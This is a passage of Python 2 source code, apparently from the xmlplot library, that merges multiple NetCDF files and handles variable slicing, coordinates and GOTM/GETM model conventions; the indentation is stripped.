return ncvar[tuple(indices)]
#return getNcData(ncvar,tuple(indices))
if istop<=ncvar.shape[idim]:
# Stop position within current file
indices[idim] = slice(istart,istop,istep)
else:
# Stop position beyond current file
indices[idim] = slice(istart,None,istep)
left = (ncvar.shape[idim]-istart-1) % istep
istart = istep-left-1
istop -= ncvar.shape[idim]
data.append(ncvar[tuple(indices)])
#data.append(getNcData(ncvar,tuple(indices)))
if indices[idim].stop is not None: break
# Process overlap between current and next file.
if ivar<len(self.ncvars)-1:
istart += self.store.overlaps[ivar]
istop += self.store.overlaps[ivar]
return numpy.concatenate(data,axis=idim)
def ncattrs(self):
return getNcAttributes(self.ncvars[0])
def __getattr__(self,name):
if name=='shape':
return [self.store.dim2length[d] for d in self.ncvars[0].dimensions]
for ncvar in self.ncvars:
if hasattr(ncvar,name): return getattr(ncvar,name)
raise AttributeError(name)
class Variables(object,UserDict.DictMixin):
def __init__(self,store):
self.store = store
def __getitem__(self,name):
ncvar = self.store.ncs[0].variables[name]
if self.store.variabledim not in ncvar.dimensions: return ncvar
return MultiNetCDFFile.Variable(self.store,name)
def keys(self):
return self.store.ncs[0].variables.keys()
def __init__(self,*args,**kwargs):
paths = []
for arg in args:
paths += glob.glob(arg)
# Functions for comparing two dictionaries, capable of
# dealing with elements that are numpy arrays.
def cmpattributes(atts1,atts2):
match = set(atts1.iterkeys())==set(atts2.iterkeys())
if not match: return False
for k in atts1.iterkeys():
match = atts1[k]==atts2[k]
if hasattr(match,'all'): match = match.all()
if not match: return False
return True
# Open NetCDF files.
self.ncs = [getNetCDFFile(path) for path in paths]
# Get list of all dimensions and variables (unions over all files).
dims,vars = set(),set()
for nc in self.ncs:
dims.update(nc.dimensions.keys())
vars.update(nc.variables.keys())
# Check if all files use all dimensions and variables.
# For variables, also check if the variable attributes are identical everywhere.
dim2coords,var2attr = {},{}
self.variabledim = kwargs.get('dimension',None)
for nc,path in zip(self.ncs,paths):
# Check variables
for var in vars:
# Check for presence of variable.
assert var in nc.variables,'Variable %s does not appear in in "%s". For multiple NetCDF files to be loaded as one single file, they must all contain the same variables.' % (var,path)
# Compare attributes
ncvar = nc.variables[var]
atts = dict([(k,getattr(ncvar,k)) for k in getNcAttributes(ncvar)])
if var not in var2attr:
var2attr[var] = atts
else:
assert cmpattributes(atts,var2attr[var]),'Current attributes of variable "%s" (%s) do not match its attributes in one of the other NetCDF files (%s).' % (var,atts,var2attr[var])
# Check dimensions
for dim in dims:
# Check for presence of dimension in dimensions and coordinate variables.
assert dim in nc.dimensions,'Dimension %s is missing in "%s". For multiple NetCDF files to be loaded as one single file, all must use the same dimensions.' % (dim,path)
# If no coordinate values are available, just continue with the next dimension.
# (we will not be able to determine the file order, so we accept the given order)
if dim not in nc.variables: continue
# Compare coordinate values.
coord = getNcData(nc.variables[dim])
if dim not in dim2coords:
dim2coords[dim] = coord
else:
if self.variabledim!=dim and (dim2coords[dim].shape!=coord.shape or numpy.any(dim2coords[dim]!=coord)):
# These coordinates vary between files - make sure this is the only dimension that differs.
assert self.variabledim is None,'More than one dimension (%s, %s) varies between files.' % (self.variabledim,dim)
self.variabledim = dim
# Make sure that the values of one dimension vary between files.
if self.variabledim is None:
raise MultiNetCDFFile.CoordinatesIdenticalException('All dimensions have the same coordinates in the supplied files. One dimension should differ between files in order for them to be loaded as a single file.')
# Sort NetCDF files based on their values for the varying dimension.
# Only works if we have the coordinate values for all files.
nc2coords = {}
for nc in self.ncs:
if self.variabledim in nc.variables: nc2coords[nc] = nc.variables[self.variabledim][0]
if len(nc2coords)==len(self.ncs):
self.ncs.sort(cmp=lambda x,y: cmp(nc2coords[x],nc2coords[y]))
# Determine the length of all dimensions in the merged file, and
# determine the overlap (if any) between the different files.
self.dim2length = dict([(k,len(v)) for k,v in dim2coords.iteritems()])
self.dim2length[self.variabledim] = 0
self.overlaps = []
lastcoord = None
for nc in self.ncs:
curcoord = getNcData(nc.variables[self.variabledim])
if lastcoord is not None:
overlap = curcoord.searchsorted(lastcoord[-1],side='right')
self.dim2length[self.variabledim] -= overlap
self.overlaps.append(overlap)
self.dim2length[self.variabledim] += len(curcoord)
lastcoord = curcoord
def ncattrs(self):
# Just return the NetCDF attributes of the first file.
return getNcAttributes(self.ncs[0])
def __getattr__(self,name):
if name=='dimensions':
return self.dim2length
elif name=='variables':
return MultiNetCDFFile.Variables(self)
# Request for a custom attribute - loop over all NetCDF files until it is found.
for nc in self.ncs:
if hasattr(nc,name): return getattr(nc,name)
raise AttributeError(name)
def close(self):
# Close all NetCDf files.
for nc in self.ncs: nc.close()
self.ncs = []
class NetCDFStore(xmlplot.common.VariableStore,xmlstore.util.referencedobject):
"""Class encapsulating a NetCDF file.
The file is expected to follow the COARDS convention.
"""
conventions = []
@staticmethod
def registerConvention(convention):
NetCDFStore.conventions.append(convention)
@staticmethod
def loadUnknownConvention(path):
try:
nc = openNetCDF(path)
except MultiNetCDFFile.CoordinatesIdenticalException:
results = [xmlplot.data.NetCDFStore(filepath) for filepath in glob.glob(path)]
return xmlplot.plot.MergedVariableStore(results,mergedimid='obs',mergedimname='observation')
for convention in NetCDFStore.conventions:
if convention.testFile(nc): return convention(nc)
return NetCDFStore(nc)
class NetCDFVariable(xmlplot.common.Variable):
def __init__(self,store,ncvarname):
xmlplot.common.Variable.__init__(self,store)
self.ncvarname = str(ncvarname)
def __str__(self):
return str(self.store)+'/'+self.ncvarname
def getName_raw(self):
return self.ncvarname
def setData(self,data,slic=(Ellipsis,),converttime=True):
assert self.store.mode in ('w','a','r+'),'NetCDF file has not been opened for writing.'
# Retrieve the NetCDF variable object.
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
# Disable automatic masking and scaling [python-netcdf only!]
if hasattr(ncvar,'set_auto_maskandscale'): ncvar.set_auto_maskandscale(False)
# Process time units - if applicable.
if converttime and hasattr(ncvar,'units'):
timeref = None
try:
timeunit,timeref = parseNcTimeUnit(ncvar.units)
except ReferenceTimeParseError:
pass
if timeref is not None:
timeref = xmlplot.common.date2num(timeref)
data = numpy.asarray((data-timeref)/timeunit,dtype=self.getDataType())
# Process offset and scale value - if applicable.
if hasattr(ncvar,'add_offset'): data = data-ncvar.add_offset
if hasattr(ncvar,'scale_factor'): data = data/ncvar.scale_factor
# Fill masked values with designated missing value (if any).
if hasattr(data,'filled') and hasattr(ncvar,'_FillValue'): data = data.filled(ncvar._FillValue)
# If the internal storage type is integer, round the values to the nearest integer first.
if numpy.dtype(self.getDataType()).kind in 'iu': data = numpy.round(data)
# Save data to NetCDF variable.
ncvar[slic] = data
def getLongName(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
if hasattr(ncvar,'long_name'):
return ncvar.long_name
else:
return self.getName()
def getUnit(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
if not hasattr(ncvar,'units'): return ''
return xmlplot.common.convertUnitToUnicode(ncvar.units)
def getProperties(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
propnames = getNcAttributes(ncvar)
return dict([(key,getattr(ncvar,key)) for key in propnames])
def setProperty(self,name,value):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
setattr(ncvar,name,value)
def getDataType(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
if hasattr(ncvar,'dtype'): return ncvar.dtype
return ncvar.typecode()
def getCoordinateVariables(self):
props = self.getProperties()
dims = self.getDimensions_raw()
dim2coordvar = {}
# First try variable-specific links between dimensions and coordinates.
if 'coordinates' in props:
coordvars = []
coordvar2dims = {}
for name in props['coordinates'].split():
coordvar = self.store.getVariable_raw(name)
if coordvar is not None:
coorddims = coordvar.getDimensions_raw()
if all([(cd in dims) for cd in coorddims]):
coordvar2dims[coordvar] = coorddims
coordvars.append(coordvar)
for coordvar in sorted(coordvars,cmp=lambda x,y: cmp(len(coordvar2dims[x]),len(coordvar2dims[y]))):
for coorddim in reversed(coordvar2dims[coordvar]):
if coorddim not in dim2coordvar:
dim2coordvar[coorddim] = coordvar
break
# Set any missing coordinate variable to default.
for dim in dims:
if dim not in dim2coordvar:
coordname = self.store.defaultcoordinates.get(dim,dim)
coordvar = self.store.getVariable_raw(coordname)
if coordvar is not None and all([(cd in dims) for cd in coordvar.getDimensions_raw()]):
dim2coordvar[dim] = coordvar
return tuple([dim2coordvar.get(dim,None) for dim in dims])
def getDimensions_raw(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
return tuple(ncvar.dimensions)
def getShape(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
return ncvar.shape
def hasReversedDimensions(self):
return True
def translateSliceSpecification(self,bounds):
if not isinstance(bounds,(list,tuple)): bounds = (bounds,)
dimnames = list(self.getDimensions_raw())
shape = self.getShape()
# Process Ellipsis (if present) and check whether the number of boundaries matches the number of dimensions.
bounds = xmlplot.common.processEllipsis(bounds,len(dimnames))
assert len(bounds)==len(dimnames), 'Number of boundaries (%i) does not match number of dimensions (%i).' % (len(bounds),len(dimnames))
# Convert bounds to list of slice objects.
# Non-integer bounds are initially ignored; after retrieving the coordinate arrays, these are filled in.
boundindices,floatslices,floatindices = [],[],[]
for idim,bound in enumerate(bounds):
if isinstance(bound,int):
# Integer value provided as index.
assert bound>=-shape[idim], 'Slice index %i lies below the lowest possible index for dimension %s (%i).' % (bound,dimnames[idim],-shape[idim] )
assert bound< shape[idim], 'Slice index %i exceeds the highest possible index for dimension %s (%i).' % (bound,dimnames[idim], shape[idim]-1)
if bound<0: bound += shape[idim]
boundindices.append(bound)
elif not isinstance(bound,slice):
# Floating point value or other non-integer object provided as index.
boundindices.append(slice(0,shape[idim]))
floatindices.append(idim)
elif not (isinstance(bound.start,(int,types.NoneType)) and isinstance(bound.stop,(int,types.NoneType))):
# Non-integer slice specification (e.g., using floating point numbers or datetime objects).
assert bound.step is None,'Non-integer slices with explicitly specified step are not supported.'
boundindices.append(slice(0,shape[idim]))
floatslices.append(idim)
else:
# Normal (integer-based) slice specification
start,stop,step = bound.indices(shape[idim])
boundindices.append(slice(start,stop,step))
# Translate slices based on non-integer values (e.g. floating point values, dates)
# to slices based on integers.
for idim in floatslices:
dimname = dimnames[idim]
# Get the entire coordinate array
coordvar = self.store.getVariable_raw(dimname)
coorddims = list(coordvar.getDimensions())
coords = coordvar.getSlice([boundindices[dimnames.index(cd)] for cd in coorddims], dataonly=True, cache=True)
istart,istop = xmlplot.common.getboundindices(coords,coorddims.index(dimname),bounds[idim].start,bounds[idim].stop)
boundindices[idim] = slice(istart,istop,1)
# Translate indices based on non-integer values (e.g. floating point values, dates)
# to integer indices.
if floatindices:
floatdimnames = [dimnames[idim] for idim in floatindices]
newshape = [shape[idim] for idim in floatindices]
summeddistance = numpy.zeros(newshape,dtype=numpy.float)
for idim in floatindices:
bound = bounds[idim]
if isinstance(bound,datetime.datetime): bound = xmlplot.common.date2num(bound)
dimname = dimnames[idim]
coordvar = self.store.getVariable_raw(dimname)
coorddims = list(coordvar.getDimensions())
for cd in coorddims:
assert cd in dimnames,'Coordinate %s depends on %s, but the variable %s itself does not depend on %s.' % (dimname,cd,self.getName(),cd)
assert cd in floatdimnames,'A float index is provided for dimension %s, but not for dimension %s on which %s depends.' % (dimname,cd,dimname)
coords = coordvar.getSlice([boundindices[dimnames.index(cd)] for cd in coorddims], dataonly=True, cache=True)
coords = xmlplot.common.broadcastSelective(coords,coorddims,newshape,floatdimnames)
summeddistance += numpy.abs(coords-bound)
indices = numpy.unravel_index(summeddistance.argmin(), newshape)
for idim,index in zip(floatindices,indices): boundindices[idim] = index
return tuple(boundindices)
def getData(self,bounds=None,stagger=False):
# Discover effective boundaries
effbounds,newshape = [],[]
for b in self.translateSliceSpecification(bounds):
if isinstance(b,slice):
# Set the upper bound to 1 + the index of the last element that will be taken
b = slice(b.start,b.stop-(b.stop-b.start-1)%b.step,b.step)
effbounds.append(b)
# Convert stagger argument to list with dimension indices to stagger.
if not stagger:
stagger = ()
elif not isinstance(stagger,(list,tuple,set)):
stagger = range(len(effbounds))
stagger = [s for s in stagger if not isinstance(effbounds[s],int)]
shape = self.getShape()
newshape = []
for i,b in enumerate(effbounds):
if isinstance(b,slice):
l = 1+(b.stop-b.start-1)/b.step
if i in stagger: l+=1
else:
l = 1
newshape.append(l)
data = numpy.empty(newshape,dtype=numpy.float)
data = numpy.ma.array(data,mask=True,copy=False)
addborders = []
for i in range(len(effbounds)):
b = effbounds[i]
addleft,addright,addcenter = False,False,True
if i in stagger:
centers = b.step%2==0 # Use centers for interface coordinates if the stride is an even number.
start = b.start - b.step/2
stop = b.stop + b.step/2 + 1
if start<0:
start += b.step
addleft = True
if stop>shape[i]+1:
stop -= b.step
addright = True
if centers: stagger.remove(i)
addcenter = stop>start
effbounds[i] = slice(start,stop,b.step)
addborders.append((addleft,addcenter,addright))
def getdata(bounds,stag):
print 'Request for:'
for i,b in enumerate(bounds):
print ' ',b,(i in stag)
return 0.
def processdim(bounds,addborders,curslice,curstagger,curtarget):
if not bounds:
data[curtarget] = getdata(curslice,curstagger)
return
curbound = bounds[0]
if isinstance(curbound,int):
return processdim(bounds[1:],addborders[1:],curslice+[curbound],curstagger,curtarget)
addleft,addcenter,addright = addborders[0]
idim = len(curslice)
start,stop = None,None
if addleft:
start = 1
processdim(bounds[1:],addborders[1:],curslice+[0],curstagger+[idim],curtarget+[0])
if addright:
stop = -1
processdim(bounds[1:],addborders[1:],curslice+[-1],curstagger+[idim],curtarget+[-1])
if addcenter:
if idim in stagger: curstagger += [idim]
processdim(bounds[1:],addborders[1:],curslice+[curbound],curstagger,curtarget+[slice(start,stop)])
processdim(effbounds,addborders,[],[],[])
assert data._mask.sum()==0,'%i entries are still masked.' % data._mask.sum()
def getNcData(self,bounds=None):
# Get NetCDF file and variable objects.
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
try:
dat = getNcData(ncvar,bounds,maskoutsiderange=self.store.maskoutsiderange)
except Exception,e:
strex = str(e)
if strex=='': strex = e.__class__.__name__
raise Exception('Unable to read data from netCDF variable "%s": %s' % (self.ncvarname,strex))
return dat
def getSlice(self,bounds=None,dataonly=False,cache=False,transfercoordinatemask=True):
if bounds is None: bounds = (Ellipsis,)
# Translate the slice specification so only slice objects and integer indices remain.
bounds = self.translateSliceSpecification(bounds)
# Retrieve the data values
n = 1L
for l in self.getShape(): n *= l
if cache and n<1000000:
# Take all data from cache if present, otherwise read all data from NetCDF and store it in cache first.
if self.ncvarname not in self.store.cachedcoords:
self.store.cachedcoords[self.ncvarname] = self.getNcData()
dat = self.store.cachedcoords[self.ncvarname]
if bounds:
assert len(bounds)==dat.ndim,'%s: number of data dimensions (%i) does not match number of provided slices (%i).' % (str(self),dat.ndim,len(bounds))
dat = dat[bounds]
else:
# Read the data slab directly from the NetCDF file.
dat = self.getNcData(bounds)
# Determine the expected shape of the returned data.
expectedshape = []
for b in bounds:
if isinstance(b,slice):
expectedshape.append((b.stop-b.start-1)/b.step+1)
expectedshape = tuple(expectedshape)
# netCDF4 pre 2010-07-12 incorrectly neglects to squeeze out singleton dimension of scalars.
# Therefore, ignore differences between expected and returned data shape if they are due to singleton dimensions.
if dat.shape!=expectedshape and [l for l in expectedshape if l>1]==[l for l in dat.shape if l>1]: dat.shape = expectedshape
# Check whether expected and returned data shapes match.
assert dat.shape==expectedshape,'%s: getNcData returned data with shape %s, while shape %s was requested.' % (self.getName(),dat.shape,expectedshape)
# If the caller wants the data values only, we are done: return the value array.
if dataonly: return dat
# Get dimension names
dimnames = list(self.getDimensions_raw())
# Create Variable.Slice object to hold coordinates and data.
newdimnames = [d for d,b in zip(dimnames,bounds) if isinstance(b,slice)]
varslice = self.Slice(newdimnames)
# Retrieve coordinate values
inewdim = 0
datamask = numpy.ma.getmask(dat)
for idim,coordvar in enumerate(self.getCoordinateVariables()):
# If we take a single index for this dimension, it will not be included in the output.
if (not transfercoordinatemask) and not isinstance(bounds[idim],slice): continue
coords = None
if coordvar is not None:
# Get coordinate values
coorddims = coordvar.getDimensions()
coordslice = [bounds[dimnames.index(cd)] for cd in coorddims]
coords = coordvar.getSlice(coordslice, dataonly=True, cache=True)
if numpy.all(coords==coords.flatten()[0]):
# Error: all coordinate values are masked.
coords = None
if coords is None:
# No coordinate variable available: auto-generate integers from 0 to dimension length-1.
if not isinstance(bounds[idim],slice): continue
coorddims = (dimnames[idim],)
coords = numpy.arange(bounds[idim].start,bounds[idim].stop,bounds[idim].step,dtype=numpy.float)
# Get the list of coordinate dimensions after the ones with single index have been sliced out.
newcoorddims = [cd for cd in coorddims if isinstance(bounds[dimnames.index(cd)],slice)]
# Transfer the coordinate mask to the data if desired.
coordmask = numpy.ma.getmask(coords)
if transfercoordinatemask and coordmask is not numpy.ma.nomask:
coordmask = xmlplot.common.broadcastSelective(coordmask,newcoorddims,dat.shape,newdimnames)
if datamask is numpy.ma.nomask:
datamask = coordmask
else:
datamask |= coordmask
# If we take a single index for this dimension, it will not be included in the output.
if not isinstance(bounds[idim],slice): continue
# Coordinates should not have a mask - undo the masking.
if coordmask is not numpy.ma.nomask:
coords = numpy.ma.getdata(coords)
# Locate variable that contains staggered [boundary] coordinates.
stagcoordvar = None
if coordvar is not None and 'bounds' in coordvar.getProperties():
# The variable itself points to a variable with staggered coordinates (CF convention: bounds attribute).
boundvar = coordvar.getProperties()['bounds']
stagcoordvar = self.store.getVariable_raw(boundvar)
if stagcoordvar is None: print 'WARNING: boundary values for coordinate variable %s are set to variable %s, but this variable is not present in the NetCDF file.' % (coordvar.getName(),boundvar)
class NetCDFWarning(Exception): pass
# Get staggered coordinates over entire domain
if stagcoordvar is not None:
try:
centshape = coordvar.getShape()
stagshape = stagcoordvar.getShape()
if len(stagshape)==len(centshape)+1: # CF convention: one extra dimension for the corner index
stagdata = stagcoordvar.getSlice(dataonly=True, cache=True)
newshape = [l+1 for l in centshape]
stagcoordvar = numpy.zeros(newshape)
if len(centshape)==1:
if stagshape[-1]!=2: raise NetCDFWarning('A 1D coordinate variable must have 2 boundaries per cell (not %i).' % (stagshape[-1],))
if stagshape[0]!=centshape[0]: raise NetCDFWarning('Lengths of the main dimension of interface (%i) and center coordinates (%i) do not match.' % (stagshape[0],centshape[0]))
stagcoordvar[:-1] = stagdata[:,0]
stagcoordvar[1: ] += stagdata[:,1]
stagcoordvar[1:-1] /= 2
elif len(centshape)==2:
if stagshape[-1]!=4: raise NetCDFWarning('A 2D coordinate variable must have 4 boundaries per cell (not %i).' % (stagshape[-1],))
stagcoordvar[ :-1, :-1] = stagdata[:,:,0]
stagcoordvar[ :-1,1: ] += stagdata[:,:,1]
stagcoordvar[1:, 1: ] += stagdata[:,:,2]
stagcoordvar[1: , :-1] += stagdata[:,:,3]
stagcoordvar[1:-1,:] /= 2
stagcoordvar[:,1:-1] /= 2
coordslice_stag = []
for slc in coordslice:
if isinstance(slc,slice):
# We take a subset of this dimension: extend the slice with 1.
coordslice_stag.append(slice(slc.start,slc.stop+slc.step,slc.step))
else:
# We take a single [centered] index from this dimension:
# Get the left and right bounds, so we can average them later.
coordslice_stag.append(slice(slc,slc+2))
if isinstance(stagcoordvar,numpy.ndarray):
coords_stag = stagcoordvar[coordslice_stag]
else:
coords_stag = stagcoordvar.getSlice(coordslice_stag, dataonly=True, cache=True)
# Undo the staggering of the dimensions that we take a single slice through
# by averaging the left- and right bounds.
for i in range(len(coordslice)-1,-1,-1):
if isinstance(coordslice[i],int): coords_stag = coords_stag.mean(axis=i)
# Coordinates should not have a mask - undo the masking.
if numpy.ma.is_masked(coords_stag):
coords_stag = numpy.ma.getdata(coords_stag)
except NetCDFWarning,e:
# Problem with specified interface coordinate - make sure they auto-generated instead.
print e
stagcoordvar = None
if stagcoordvar is None:
# Auto-generate the staggered coordinates.
coords_stag = xmlplot.common.stagger(coords)
# Insert data dimensions where they are lacking in coordinate
coords = xmlplot.common.broadcastSelective(coords, newcoorddims,dat.shape, newdimnames)
coords_stag = xmlplot.common.broadcastSelective(coords_stag,newcoorddims,[l+1 for l in dat.shape],newdimnames)
# Assign coordinate values
varslice.coords [inewdim] = coords
varslice.coords_stag[inewdim] = coords_stag
inewdim += 1
# If center coordinates came with a mask, apply that same mask to the data.
if datamask is not numpy.ma.nomask:
dat = numpy.ma.masked_where(datamask,dat,copy=False)
varslice.data = dat
return varslice
def __init__(self,path=None,*args,**kwargs):
xmlstore.util.referencedobject.__init__(self)
xmlplot.common.VariableStore.__init__(self)
self.datafile = None
self.nc = None
self.mode = 'r'
self.cachedcoords = {}
self.defaultcoordinates = {}
# Whether to mask values outside the range specified by valid_min,valid_max,valid_range
# NetCDF variable attributes (as specified by CF convention)
self.maskoutsiderange = True
if path is not None:
if isinstance(path,(tuple,list,basestring)):
# Path to a NetCDF file is provided, or a list/tuple of paths.
self.load(path,*args,**kwargs)
else:
# Open NetCDF file is provided.
self.nc = path
self.autoReassignCoordinates()
self.relabelVariables()
def __str__(self):
if self.datafile is None: return ''
if isinstance(self.datafile,(list,tuple)): return ', '.join(self.datafile)
return self.datafile
def getDimensionInfo_raw(self,dimname):
dimname = self.defaultcoordinates.get(dimname,dimname)
res = xmlplot.common.VariableStore.getDimensionInfo_raw(self,dimname)
var = self.getVariable_raw(dimname)
if var is None: return res
res['label'] = var.getLongName()
res['unit'] = var.getUnit()
props = var.getProperties()
if dimname in ('z','z1'):
res['preferredaxis'] = 'y'
elif self.isTimeDimension(dimname):
res['datatype'] = 'datetime'
res['preferredaxis'] = 'x'
res['unit'] = ''
prefaxis = props.get('axis',None)
if prefaxis is not None:
res['preferredaxis'] = prefaxis
if props.get('positive','up')=='down':
res['reversed'] = True
return res
def save(self,path):
assert isinstance(self.datafile,basestring),'Only single NetCDF files can be saved.'
shutil.copyfile(self.datafile,path)
def unlink(self):
if self.nc is not None:
# Close NetCDF result file.
self.nc.close()
self.nc = None
self.datafile = None
def load(self,path,mode='r'):
# Store link to result file, and try to open the CDF file
self.datafile = path
self.mode = mode
nc = self.getcdf()
# Auto-reassign coordinates
self.autoReassignCoordinates()
# Re-label variables - this must be done after reassignments because relabel requests
# the variable names, which are then cached and never requested again. Variable names can
# depend on dimension reassignments, e.g., if some reassignments apply, extra coordinate
# variables may be added.
self.relabelVariables()
def autoReassignCoordinates(self):
self.defaultcoordinates = {}
def getcdf(self):
"""Returns a NetCDFFile file object representing the NetCDF file
at the path in self.datafile. The returned object should follow
Scientific.IO.NetCDFFile conventions.
"""
if self.nc is not None: return self.nc
assert self.datafile is not None, 'The path to the NetCDF file has not yet been set. This may imply that the object has been unlinked.'
self.nc = openNetCDF(self.datafile,self.mode)
return self.nc
def getVariableNames_raw(self):
return map(str,self.getcdf().variables.keys())
def getVariableLongNames_raw(self):
varnames = self.getVariableNames_raw()
nc = self.getcdf()
vardict = {}
for varname in varnames:
if varname not in nc.variables:
vardict[varname] = varname
continue
ncvar = nc.variables[varname]
if hasattr(ncvar,'long_name'):
vardict[varname] = ncvar.long_name
else:
vardict[varname] = varname
return vardict
def getVariable_raw(self,varname):
ncvarname = str(varname)
nc = self.getcdf()
if ncvarname not in nc.variables: return None
return self.NetCDFVariable(self,ncvarname)
def createDimension(self,dimname,length):
assert self.mode in ('w','a','r+'),'NetCDF file has not been opened for writing.'
nc = self.getcdf()
nc.createDimension(dimname, length)
def getProperties(self):
nc = self.getcdf()
return dict([(k,getattr(nc,k)) for k in getNcAttributes(nc)])
def setProperty(self,name,value):
setattr(self.getcdf(),name,value)
def addVariable(self,varName,dimensions,datatype='d',missingvalue=None):
assert self.mode in ('w','a','r+'),'NetCDF file has not been opened for writing.'
nc = self.getcdf()
if missingvalue is not None:
try:
# netcdf-python needs the fill value to be specified during variable creation.
ncvar = nc.createVariable(varName,datatype,dimensions,fill_value=missingvalue)
except:
ncvar = nc.createVariable(varName,datatype,dimensions)
setattr(ncvar,'_FillValue',missingvalue)
setattr(ncvar,'missing_value',missingvalue)
else:
ncvar = nc.createVariable(varName,datatype,dimensions)
return self.getVariable_raw(varName)
def copyVariable(self,variable,name=None,dims=None):
assert self.mode in ('w','a','r+'),'NetCDF file has not been opened for writing.'
assert isinstance(variable,NetCDFStore.NetCDFVariable),'Added variable must be an existing NetCDF variable object, not %s.' % str(variable)
shape = variable.getShape()
props = variable.getProperties()
if dims is None: dims = variable.getDimensions_raw()
nc = self.getcdf()
for dim,length in zip(dims,shape):
if dim not in nc.dimensions: self.createDimension(dim, length)
data = variable.getSlice((Ellipsis,),dataonly=True)
nctype = {'float32':'f','float64':'d'}[str(data.dtype)]
if name is None: name = variable.getName()
var = self.addVariable(name,dims,datatype=nctype,missingvalue=props.get('_FillValue',None))
for key,value in props.iteritems():
try:
var.setProperty(key,value)
except AttributeError: # netcdf-python does not allow _FillValue to be set after variable creation - ignore this.
if key!='_FillValue': raise
var.setData(data)
return var
def getDimensions(self):
nc = self.getcdf()
ncdims = list(nc.dimensions)
def cmpdims(x,y):
for v in nc.variables.values():
if x in v.dimensions and y in v.dimensions:
curdims = list(v.dimensions)
return cmp(curdims.index(x),curdims.index(y))
return 0
ncdims.sort(cmp=cmpdims)
return ncdims
def getDimensionLength(self,dimname):
nc = self.getcdf()
length = nc.dimensions[dimname]
isunlimited = length is None
if not (length is None or isinstance(length,int)):
# NetCDF4 uses dimension objects.
isunlimited = length.isunlimited()
length = len(length)
elif isunlimited:
# NetCDF3: locate length of unlimited dimension manually.
for vn in nc.variables.keys():
v = nc.variables[vn]
if dimname in v.dimensions:
curdims = list(v.dimensions)
length = v.shape[curdims.index(dimname)]
break
return length,isunlimited
def getDefaultCoordinateDelta(self,dimname,coord):
return 1.
def isTimeDimension(self,dimname):
"""See if specified dimension is a time dimension according to COARDS convention.
"""
try:
timeunit,timeref = self.getTimeReference(dimname)
except ReferenceTimeParseError:
return False
return True
def getTimeReference(self,dimname):
"""Parses the "units" attribute of the NetCDF variable, and returns the time unit
(in days) and the reference date. Throws an exception if the "units" attribute does
not match the COARDS/udunits convention for specifying time offsets.
"""
nc = self.getcdf()
if dimname not in nc.variables:
raise ReferenceTimeParseError('dimensions "%s" does not have an associated variable.' % (dimname,))
cdfvar = self.getcdf().variables[dimname]
if not hasattr(cdfvar,'units'):
raise ReferenceTimeParseError('variable "%s" lacks "units" attribute.' % (dimname,))
return parseNcTimeUnit(cdfvar.units)
class NetCDFStore_GOTM(NetCDFStore):
"""Class encapsulating a GOTM/GETM-produced NetCDF file.
The file is expected to follow the COARDS/CF convention, and in addition assumes
- the GOTM/GETM convention for storing time-variable depth/leyer heights (h + elev).
- the GETM convention for curvilinear grids (xic, etac -> lonc, latc)
"""
@staticmethod
def testFile(nc):
match = False
ncvars,ncdims = nc.variables,nc.dimensions
# Test for GETM with curvilinear coordinates
# (either lon,lat or staggered Cartesian coordinates must be available)
if ('xic' in ncdims and 'etac' in ncdims and
(('lonc' in ncvars and 'latc' in ncvars)
or ('xx' in ncvars and 'yx' in ncvars))): match = True
# Test for GETM with cartesian coordinates
if 'xc' in ncdims and 'yc' in ncdims and 'lonc' in ncvars and 'latc' in ncvars: match = True
# Test for GOTM convention for depth represented by layer heights and surface elevation.
if 'z' in ncdims and 'z1' in ncdims and 'h' in ncvars and 'zeta' in ncvars: match = True
# Test for GETM convention for general, hybrid or adaptive vertical coordinates.
if 'level' in ncdims and 'bathymetry' in ncvars and ('h' in ncvars or 'hmean' in ncvars): match = True
# Test for GETM convention for sigma vertical coordinates.
if 'sigma' in ncdims and 'bathymetry' in ncvars and ('elev' in ncvars or 'elevmean' in ncvars): match = True
return match
def __init__(self,path=None,*args,**kwargs):
self.hname,self.elevname = 'h','zeta'
self.bathymetryname = None
self.depthdim = None
# Link new depth coordinates to an existing NetCDF dimension
self.depth2coord = {}
self.generatecartesiancenters = False
NetCDFStore.__init__(self,path,*args,**kwargs)
def autoReassignCoordinates(self):
NetCDFStore.autoReassignCoordinates(self)
# Get reference to NetCDF file and its variables and dimensions.
nc = self.getcdf()
ncvars,ncdims = self.getVariableNames_raw(),nc.dimensions
# --------------------------------------------------------------
# Re-assign x,y coordinate dimensions
# --------------------------------------------------------------
# Re-assign for GETM with curvilinear coordinates
# Preferentially, x and y are re-assigned to longitude and latitude.
# If these are not available, they will be re-assigned to projected x and y instead.
# Do this for centre coordinates ("c"), corner coordinates ("x"), u coordinates ("u") and v coordinates ("v").
for pt in 'cxuv':
if 'xi'+pt not in ncdims or 'eta'+pt not in ncdims: continue
if 'lon'+pt in ncvars and 'lat'+pt in ncvars:
self.defaultcoordinates['xi' +pt] = 'lon'+pt
self.defaultcoordinates['eta'+pt] = 'lat'+pt
elif 'x'+pt in ncvars and 'y'+pt in ncvars:
self.defaultcoordinates['xi' +pt] = 'x'+pt
self.defaultcoordinates['eta'+pt] = 'y'+pt
# Re-assign for GETM with cartesian coordinates.
# x and y are re-assigned to longitude and latitude, if possible.
if 'xc' in ncdims and 'yc' in ncdims:
# Center coordinate are available.
if 'lonc' in ncvars and 'latc' in ncvars:
self.defaultcoordinates['xc' ] = 'lonc'
self.defaultcoordinates['yc'] = 'latc'
if 'xx' in ncdims and 'yx' in ncdims:
# Boundary coordinate are available.
if 'lonx' in ncvars and 'latx' in ncvars:
self.defaultcoordinates['xx'] = 'lonx'
self.defaultcoordinates['yx'] = 'latx'
# --------------------------------------------------------------
# Re-assign vertical dimension
# NB the is done automatically for GOTM, because the original
# z and z1 variables are overwritten.
# --------------------------------------------------------------
if 'level' in ncdims and 'bathymetry' in ncvars and ('h' in ncvars or 'hmean' in ncvars):
# GETM with general, hybrid or adaptive vertical coordinates
# Depth will be computed from bathymetry(x,y) and layer heights(x,y,z,t).
# Depth dimension is called "level".
self.defaultcoordinates['level'] = 'z'
self.bathymetryname = 'bathymetry'
